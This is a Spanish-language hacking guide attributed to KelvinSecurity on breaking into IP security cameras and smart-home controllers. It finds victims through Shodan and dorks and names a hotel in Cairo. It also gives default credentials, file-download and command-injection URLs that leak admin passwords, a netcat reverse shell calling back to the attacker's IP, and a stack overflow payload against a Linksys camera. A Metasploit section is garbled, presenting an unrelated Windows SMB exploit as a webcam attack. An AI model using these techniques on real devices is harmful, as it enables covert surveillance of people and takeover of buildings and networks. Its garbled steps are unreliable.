Estudio De Técnicas Para Romper Sistemas De

Cámaras De Seguridad
Team : KelvinSecurity
 WebCam y Camara De Seguridad

A Nivel global los sistemas de vigilancia estan expandidos en

industrias,corporaciones y gobiernos con la finalidad de monitorear a personas ante
posibles robos pero esta vez hablaremos e iremos a un entorno “hacking” en que un
hacker puede hackear una camara de seguridad y tener el control a su disposicion en
empresas existe el equipo de vigilancia y un operador del equipo tanto en bancos,
edificiones empresariales y areas de gobierno cada “modelo” adquirido tiene una
vulnerabirilidad afectada desde un servidor conocida como camara inalambrica
soportado por multiples navegadores.

Utilizando multiples protocolos de red :HTTP / TCP / IP / UDP / STMP / DDNS /

SNTP /
DHCP / FTP.

Debemos tener claro que existen 2 formas que podremos tener control sobre una
camara de seguridad.

1) En presencia del lugar que se encuentre que es cuando esta es una camara de
seguridad inalambrica y podemos conectarnos via “WiFi” hemos visto muchas
veces que si nos conectamos a la red local de un resturante o un lugar publico
podriamos notar que si buscamos la ip “Local” y scannemos con Nmap
notariamos puertos que nos llevarian a la plataforma de la camara IP.

2) Sin Presencia Del Hacker: Esta se produce cuando utilizamos las mismas
herraminetas identificamos la IP en la red y scanneamos con nmap o cualquier
otro scanner de puertos y identificar el puerto necesario para entrar al servidor
de la camara IP.

Adicional: Las camaras de seguridad estan protegidas con credenciales que pueden
venir por defectos pero pueden ser modificadas por el usuario que compro el producto
esta tambien puede ser utilizada con exactitud en solo algunos “Navegadores” y
Software por puertos diferentes.
 Herramientas Que Utilizaremos

Nmap: Es un scanner que busca identificar los puertos que se encuentra en una
direccion IP puedes ejecutar este software por medio de la terminal o como cualquier
otro software con su infraestructura grafica.

Direccion de descarga: https://nmap.org

Shodan: Como motor de busqueda ademas que cumple las 2 funciones que es buscar la
victma y scannear los puertos.
 Buscando Camaras De Seguridad Con Dorks – Buscador

Mediante el motor de busqueda google podremos utilizar dorks para realizar

busqueda de estas camaras de seguridad donde podemos acceder sin ninguna
restriccion a la visualizacion pero si una restriccion al momento de laconfiguracion de
esta.

Las dorks las puedes encontrar en paginas webs como pastebin o blogs e aca un
ejemplo de las dorks:

http://pastebin.com/8cX7KAza
Google Buscador:

Google Imágenes:
 WebCam Con Credenciales Y Sin Credenciales

Por medio de dorrks hemos encontrado esta camara en un hotel si vamos al “Main”
principal de la camara del servidor veremos a continuacion las opciones de control.

Movemos un poco la camara y:

 Conociendo El Protocolo De Red Y Mapeando

Si tienes la extension de chrome de “shodan” te resultara mucho mas facil a la vez

navegar e identificar los dispositivos y sus puertos ademas con informacion “extra”
mediante de nmap para no faltar como herramienta scanneamos la direccion Ip y nos
manda unas 4 la primera del puerto 80 es donde acabamos de entrar y es la que nos
permitio visualizar la plataforma y en donde de igual manera nos ha pedido
credenciales para poder mover la camara y tomar acciones de usuario con privilegios
elevados.

Puerto 80: como respuesta del servidor en HTTP/1.0 200 OK de peticion correcta
podemos entrar a la plataforma visualizar la camara pero sin aplicar cambios.
Puerto 21: De igual manera protegido esta vez no podemos entrar via ftp-21 al menos
que esta se establesca con una clave por defecto o algun exploit que nos de la
disponibilidad de romper esa peticon y saltar al otro punto.

Puerto 554: El protocolo de transmision hemos visto muchos estos en la NASA donde
utilizan el rtsp al navegador luego que sea ejecutado descarga el servidor este sera
ejecutado en tu ordenador y se abrira un reproducto para visualizar la camara de
seguridad.

Siemens IP Camera Descargar Del Config.ini

Durante un tiempo conocemos el exploit de Arbitary File Dowload en este caso nos
aprobechamos de un vinculo que especifica un archivo o fichero pero en este caso
usaremos ese vinculo para descargar el config.ini donde se encuentra la contraseñas
con privilegios elevados para poder iniciar sesion tenemos el siguiente login:

Como observan nos

pide un “Nombre” Y
“Usuario” la direccion
la cambiaremos a
 cgi-
bin/chklogin.cgi?
file=config.ini
y se nos auto
descargara las
credenciales.

Una vez descargado tendremos las credenciales para acceder a la plataform utilizando
las busquedas del user_id= y mediante shodan Server: Boa with IPv6.
 Busando Camaras De Seguridad De Hoteles

Four Seasons Hotel es un hotel que queda en el Cairo y este hotel lo identifique por
medio de una proveedora ISP mediante el motor de buscador “shodan” y utilizando el
comando “Org” para buscar mas dispositivos en esta misma organiacion conocida
como
FOURSEASONS HOTEL in cairo a continuacion:
Ahora como observamos en organizacion hemos agregado la del hotel y Server BOA
como sabemos que si hacemos una busqueda como server:BOA en shodan tendremos
servidores que son camaras de seguridad IP.

- Proveedor Con Organizacion hotelera

ISP: Es la empresa que brinda conexión a Internet a sus clientes. Un ISP conecta a sus
usuarios a Internet a través de diferentes tecnologías como DSL, cablemódem, GSM,
dial-up, etcétera.

No solo camaras de seguridad tambien existen otros productos tecnologicos que

utilizan los hoteles para facilitar al cliente como una “Smarth Home” que es un
software que “Mantiene Conexión” con distintos dispositivos por medio de una
direccion IP y este te permite controlar remotamente tanto la camara de tu cuarto y
la iluminacion de la habitacion,TV y puertas.
 Controlando una Smart Home

Controlar un hogar desde un celular por medio de una conexión wifi es posible y
cuando se convirte una IP publica y establece un servidor con una plataforma que se
iguala a la aplicación es cuando pone en riesgo a que un hacker “Audite” o “utilize el
hard coded de passwords list” que se encuentran como el listado de las contraseñas
por defecto para ingresar a cualquier dispositivo.

Loxone es uno de ellos hemos podido identificar e ingresar contraseña por defecto
una para el acceso a la configuracion por medio del puerto 8090 del administrador de
servidor y otro protegido aun mas pero podria estar en el hard coded de las
contraseñas por defecto e ingresar al puerto correcto para tener el remoto control
sobre la iluminacion y posiblemente otras opciones que nos proporcione la
plataforma este es igual como coger una tablet y realizar una conexión Wifi con un
controlador especifico y comenzar a manipular remotamente la habitacion:
 Implementar un ataque y identificar servidor

Podemos implementar un metodo de realizar ataques de fuerta bruta al servidor

utilizando un diccionario para llegar a entrar con una “por defecto” podria funcionar
muy bien como puedes observar la “Direccion IP” el puerto “80” que se establece por
defecto y un diccionario de usuarios y otro de passwords como por ejemplo un http
brute force a continuacion en el producto servidor de LOXONE notamos que existian 2
puertos 1 que te permite entrar al sistema de remoto control y otro que solo
configura los puertos para hacer funcionar el dispositivo por medio de un servidor IP.
Como observamos en la imagen de arriba el servidor nos pide ingresar credenciales el
problema es muy comun las credenciales por defecto de este son “admin:admin”
entonces existe otro problema comun pero el otro es que no tenemos las mismas
ventajas de usar el “user:admin y password:admin” sobre ese ya que ese se encuentra
protegido posiblemente con una contraseña asignada o contraseña por defecto que
aun no hemos investigado.

Ahora les pedire que scannen la direccion IP con Nmap y ver si existe otro puerto en
este caso existe el puerto 80 protegida con otra contraseña que no esta por defecto.
Si agregamos la contraseña “admin:admin” miren:

Durante el scanneo de puertos como ven nos enteramos de que podemos entrar a
otros puertos como el 8090 con la credencial que entra en todas las plataforma de
loxone por medio de ese puerto credenciales conocidas como user:admin y
password:admin.

Una vez accedido tenemos el setup configuracion basica del servidor el remoto
control que son elevacion de privilegios y el user management para agregar usuarios
tambien tenemos el “Show Video” para ver en vivo la camara de seguridad.

Muy bien algo parecido a btcino solo que este no lo hemos puesto a prueba de
busqueda de directorios ya que sabemos que estan seguros e inspeccion de las
funciones con el java script.
Lo mismo puede pasar con los hoteles utilizando en shodan podemos indeitifcar
hoteles “servidor” y empezar a auditar uno de los consejos en empezar a auditar
estos dispositivos es utilizar herramientas basicas y otras moeradas como Burp Suite y
DirBuster – Url Fuzzer , Payload Command Injection y manualmente la inspeccion de
codigo tambien observando las funciones en java script a diferencia de las camaras IP
estas tienen por defecto en algunas un fichero .ini el cual se puede extraer buscando
su localizacion en oro caso el Remote code Execution Rce puede funcionar muy bien
aca.

Cifrado De Contraseñas debiles

La contraseña probablemente no exista pero aun asi existen encryptaciones que

les ha costado a hackers de medio rango decifrarlas en las camaras de seguridad como
hablamos anterior mente existe ficheros en .ini donde se almacenan estas contraseñas
hemos visto la visualizacion en texto sobre la informacion del servidor y usuario y
contraseña establecidas pero existen otros que han llegado con una encryptacion de
bse64 los ingenieros o trabajadores de esas empresas desarrollo de software han
creido que el base64 no lo entenderia un hacker comun pero al igual que existe su
creador exisitra su destructor en los servidores IP de las camaras de el siguiente
modelo en el vinculo “/server/usr.ini” fichero de configuracion encontraras la
contraseña en base64.

Estos 3 en su servidor IP en el vinculo ini de usr.ini almacena contraseñas con una

encryptacion en base64 de manera sencilla se puede utilizar un decrypt.

De Volver Variable JavaScript Con Credenciales

Hablamos anteriormente de los ficheros .ini que tienen la configuracion dentro de ella
usuario y contraseña este es un metodo casi igualativo y funciona para camaras
siemens de igual manera a continuacion aremos lo siguiente:

Nos encontramos en el login la practica siguiente es sencilla y cambiar esta por la

siguiente:

 cgi-bin/readfile.cgi?query=ADMINID
De vuelve una variable JavaScript que contenga las credenciales .

La mayoria de las camaras tienen el mismo problema pero alguna vez nos tocaria con
camaras como Hikvision donde existen unos que otros exploits que tienen
funcionalidad diferente como DoS o ByPass.

Root shell en Camara IP Axis 206 - 210

Para aplicar esta tecnica es necesario inciar sesion en la camara IP Axis en versiones
de AXIS 206 y 210 mediante esta tecnica utilizaremos netcat esa tecnica es reciente
del año 2016 dare detalles de la descripcion del exploit.

Descripcion:

Si usted tiene un usuario puede editar un archivo de inicio para esta ejecución de un
comando como root, como netcat utilizando conchas revertidas

Prueba:

Nos ponemos en nuestro ordenador:

nc -lvp 8080
http: // <ip-cámara> /admin-bin/editcgi.cgi?file=/etc/init.d/ftpbanner

Una vez conectado editar un archivo de inicio como /etc/init.d/ftpbanner y añadir la

cáscara inversa utilizando netcat

(Rm / tmp / f; mkfifo / tmp / f; cat / tmp / f | / bin / sh -i 2> & 1 | nc <NUESTRO-
IP> 8080> / tmp / f) y

Ahora ve a la web panel y reiniciar la cámara y en 60 segundos se conectará a su

ordenador Y usted tiene un intérprete de comandos inversa.

Ahora veremos como lo hace el investigador de este metodo de explotacion

Pasos Realizado Contra Axis 206 - 210 Usando Netcat

Una vez iniciado sesion en la AXIS nos dirigimos a “/admin/scripting.shtml” y en >

funciones de scripts abrimos el editor de scripts.

Una vez dentro del editor de scripts nos dirigimos e ftpbaner

Tenemos los privilegios para realizar cambios ya alli netcat ara su trabajo insertamos
el codigo:
(Rm / tmp / f; mkfifo / tmp / f; cat / tmp / f | / bin / sh -i 2> & 1 | nc <NUESTRO-
IP> 8080> / tmp / f)

De la siguiente forma y clickeamos en “Save” guardar.

Ahora nos toca reiniciar volvemos al menu:

-panel de configuracion
 - realizamos una determinada espera

Y listo el metodo de explotacion culminado asi de sencillo.

Explotacion De Webcam con metasploit

-Webcam c160
 Nuestra victima el modelo webcam C160 y metasploit cuenta con un modulo para
la explotacion de este modelo sencillamente metasploit facilita a personas a explotar
vulnerabirilidad de forma automatizada.
Una vez explota esta vulnerabirilidad el atacante tendra la visualizacion de su victima
integrando en la URL de su navegador un localhost.

1 - Abrir Consola Y Tipear: msfconsole

2) Utilizar el siguiente Exploit:

use exploit/windows/smb/ms08_067_netapi

1) utilizar payload y agregar meterpreter

set PAYLOAD
windows/meterpreter/reverse_tcp

3) Tipeamos set RHOST (Aqui Direccion Ip De Tu Victima

4) luego tipeamos con un ejemplo set LHOST 192.155.0.150

5) luego tipeamos exploit observen la imagen

6) Luego tipeamos webcam_list

run webcam -p /var/www

Luego se ejecuta la webcam tenemos la visualizacion

http://localhost/webcam.htm

Secuestro De Click Para Ejecucion De Script

Que Es Click-jacking: El clickjacking, o secuestro de clic, es una técnica maliciosa

para engañar a usuarios de Internet con el fin de que revelen información confidencial
o tomar control de su computadora cuando hacen clic en páginas web aparentemente
inocentes . En uno de los muchos navegadores o plataformas con alguna
vulnerabilidad, un ataque de clickjacking puede tomar la forma de código embebido o
script que se ejecuta sin el conocimiento del usuario; por ejemplo, aparentando ser
un botón para realizar otra función.
 - sitio de prueba http://feross.org/hacks/webcam-spy/
Al momento del usuario clickear donde dice “Click Me!” se deberia ejecutar un script
que permita encender la webcam y el microfono y esto se debe a una vulnerabirilidad
en adobe flash este script puede ser modificado a tu gusto por que se encuentra en
github y es codigo abierto.
 https://github.com/feross/webcam-spy
pero esto es solo un ejemplo de un metodo que fue tomado como un exploit y aun
sigue funcionando no han sido muy claro los investigadores de seguridad sobre el
control que puede tener un hacker a un usuario que visita su web y clickea en “click
me” durante el proceso de secuestro de click para ejecucion de java script.

Camara IP Hacking - Avanzado

La presente camara es una cámara de seguridad exterior, resistente a la intemperie,
el día y la noche, que incluye Poder sobre el soporte de Ethernet (PoE). En poco
menos de 1.000 dólares, es uno de D-Link Las cámaras más caras.

Al igual que con la mayoría de otras cámaras de red, la interfaz administrativa

primaria para el DCS 7410 se da a través de un servidor web integrado; en este caso,
el servidor lighttpd de código abierto.

En el arranque, puesta en marcha secuencias de comandos de la cámara generan

reglas de acceso para el servidor lighttpd con el fin para proteger la transmisión de
las páginas de vídeo y la interfaz administrativa:

Una regla de acceso se crea para cada subdirectorio en el directorio raíz del servidor
web lighttpd, todos excepto para el directorio cgi-bin.

- Directorio CGI

La mayor parte de los scripts CGI de la cámara están ubicados en el directorio cgi
protegido. el desprotegida directorio cgi-bin sólo contiene un único archivo, rtpd.cgi,
que es un script bash que se puede utilizar para iniciar y detener RTP daemon de la
cámara.
Sin embargo, el guión rtpd.cgi tiene un grave defecto. Analiza los parámetros de
solicitud reemplazando todos los símbolos de unión en $ cadena de consulta con
espacios, y luego eval es el resultado:

Condiciones normales de empleo, la siguiente petición HTTP resultaría en una

variable de entorno $action llamado está creando cuyo valor se establece en "Start":

 $ wget http://192.168.1.101/cgi-bin/rtpd.cgi?action=start

Condiciones normales de empleo, la siguiente petición HTTP resultaría en una

variable de entorno $action llamada que se está creando cuyo valor se establece en
"start": Pero debido a que los datos en $QUERY_STRING un atacante no autenticado
puede ejecutar cualquier comando solo es necesario especificar como parte de los
parámetros GET HTTP:

 $ wget http://192.168.1.101/cgi-bin/rtpd.cgi?reboot
Desde lighttpd y las secuencias de comandos CGI que se ejecuta ejecuta con
privilegios de root, también lo hacen el atacante de comandos. Lo que es más, se hizo
eco de la salida del comando (s) especificada volver al cliente web del atacante, que
proporciona un intérprete de comandos web integrado base de lanzamiento nuevos
ataques a la red.
 Un atacante también puede utilizar esta vulnerabilidad para recuperar la contraseña
de administración de texto sin formato para la cámara.
El siguiente comando se ejecuta las secuencias de comandos de puesta en marcha de
la cámara con el fin para recuperar la contraseña de administración de la NVRAM:

echo AdminPasswd_ss | tdb get HTTPAccount

Sustitución de los espacios con los símbolos de unión para su uso con rtpd.cgi, la
petición del atacante se convierte en:

$ wget
http://192.168.1.101/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

El resultado de este comando devuelve la contraseña administrativa al atacante de

cliente web:
 Directorio De Camaras Vulnerables

Esta vulnerabilidad ha sido confirmada en la mayoría de las versiones de firmware

para las siguientes cámaras:

Vendedor: Modelo:
D-Link DCS-1130
D-Link DCS-2102
D-Link DCS-2121
D-Link DCS-3410
D-Link DCS-5230
D-Link DCS-5605
Trendnet TV-IP512WN

Estas camaras se encuentran en hogares y para buscar estos dispositivos podemos

utilizar shodan como ejemplo:
 https://www.shodan.io/search?query=server%3A+lighttpd+title%3AD-Link

- Comando shodan
 Explotando Linksys WVC80N

El dispositivo WVC80N Linksys es el vídeo de color inalámbrica y una cámara IP de

audio. A partir de $ 120 USD es claramente dirigida al mercado de consumo SOHO.

En la configuración por defecto de la interfaz web, todos los usuarios sin privilegios
(incluyendo no autenticado usuarios) se les permite el acceso a la “/img/snapshot.cgi
URL” que es en realidad el enlace simbolico a la “/adm/ez.cgi”.

El ejecutable ez.cgi es referenciado por varios otros enlaces simbólicos, así, y

selecciona qué para realizar la acción basada en la que se invocó enlace simbólico. La
acción snapshot.cgi enlace simbólico específicamente está a cargo de la función
sub_AE64:

La función sub_AE64 sin embargo contiene un defecto grave en la que toma el

QUERY_STRING variable de entorno que contiene los datos suministrados por el
usuario y strcpy de TI a un tamaño fijo apilar variable ("destino"):

La mejor variable de pila se encuentra a sólo 152 bytes lejos de la dirección de

retorno guardado en el apilar.
Así, la dirección de retorno guardado se sobrescribe con facilidad mediante la
presentación de una solicitud de /img/snapshot.cgi con una cadena de consulta de
152 bytes o más:

 $ wget http://192.168.1.101/img/snapshot.cgi?$(perl -e ‘print “A”x152’)

Si bien esto puede ser usado para obtener la ejecución de código arbitrario en el
dispositivo, una simple explotación de mayo ser diseñado.
Desde el binario ez.cgi también se encarga de las solicitudes de enlaces simbólicos
restringidas, un atacante puede obligar a la función vulnerable para volver a un
controlador restringido de este modo la funcionalidad de la invocación que de otro
modo requerirían acceso administrativo.

El controlador de función para el enlace simbólico admcfg.cfg (sub_9B88) es quizás el

más fácil y lo mas obvio; esta función no requiere argumentos y devuelve ejecución
actual del dispositivo configuración al solicitante, incluidas las credenciales
administrativas e inalámbricas:
 $ wget http://192.168.1.101/img/snapshot.cgi?$(perl -e ‘print “A”x148; print
“\x88\x9B”’)
El envío de la solicitud no autenticado por encima de la cámara vuelve lo que parece
ser un archivo de configuración base64:
Sin embargo, intentar utilizar una decodificación base 64 estándar contra falla de
estos datos:

-WVC80N

Esto es debido a que el dispositivo WVC80N utiliza una cadena de clave base 64 no
estándar, tal como se documenta en el guía del usuario del dispositivo:

-GUIA

Sustitución de la cadena de clave base 64 estándar con esta costumbre uno de cada
módulo de base 64 de Python es trivial, y permite a un atacante para decodificar
correctamente todo el archivo de configuración, que incluye de texto sin formato
credenciales administrativas e inalámbricas:

 Esto proporciona al atacante no sólo con el acceso a la red inalámbrica de la

cámara, sino tambiéncon acceso administrativo a la propia cámara.
 Explotacion De IQLnvision

El IQ832N es parte de la línea de productos de Sentinal IQinVision, es un día al aire

libre y alta noche cámara de la definición, y los costos de más de $ 1,000 USD.
Por defecto, estas cámaras proporcionan un canal de video sin necesidad de
autenticación, y ninguno de los desplegado instalaciones que fueron investigados
habían cambiado esta configuración predeterminada.

Mientras que la administración interfaz está protegido con contraseña, los usuarios
pueden acceder a cualquier recurso sin autenticación puede abrir una superficie de
ataque más grande para la explotación. En este caso, el vector de ataque toma la
forma de la página oidtable.cgi, que puede ser solicitada por los usuarios no
autenticados. Esta página CGI acepta un solo parámetro, grep, que se utiliza para
filtrar los resultados devueltos por la página oidtable.cgi:

Después de verificar que el valor grep especificado es inferior a 32 caracteres de

longitud, sprintf edad table.cgi es el valor grep en una cadena de comandos, que más
tarde se pasa a popen:
 Esto permite que un atacante no autenticado para inyectar fácilmente comandos
shell arbitrarios que será ejecutado como root. Además, la salida de estos comandos
se hizo eco de vuelta al cliente web del atacante, que proporciona un intérprete de
comandos web integrado desde el cual lanzar más ataques en la red(nótese el uso de
$IFS en lugar de caracteres de espacio en blanco:

 $ wget http://192.168.101/oidtable.cgi?grep=’$IFS/tmp/a;ps;


A pesar de toda la cadena de grep se limita a 32 caracteres, los comandos más largos
podría simplemente se hizo eco en un script de shell para su posterior ejecución.
Además, esta cámara viene con netcat instalado, y con la opción -e infame habilitado,
lo que permite a un atacante para iniciar una reverse-callback shell.

Esta vulnerabilidad también se puede aprovechar para obtener o cambiar la

contraseña de administración cifrada, que se almacena en / etc / privpasswd, se cifra
mediante DES, y pueden ser atacados utilizando herramientas estándar de la
contraseña de craqueo como John the Ripper.
 $ wget http://192.168.1.101/oidtable.cgi?grep=’$IFS/etc/privpasswd;’

Gran parte de la línea de productos de IQinVision se ve afectado por esta

vulnerabilidad, incluyendo su serie 3, 7- serie, Sentinel, Alianza-Pro, la Alianza y la
Alianza-MX-Mini cámaras. Estas cámaras son conocido por ser utilizado por las
empresas, la policía, los bancos, los gobiernos locales, las prisiones, los casinos y DHL
En el momento de escribir estas líneas, Shodan reporta más de 100 de acceso público
y potencialmente cámaras vulnerables.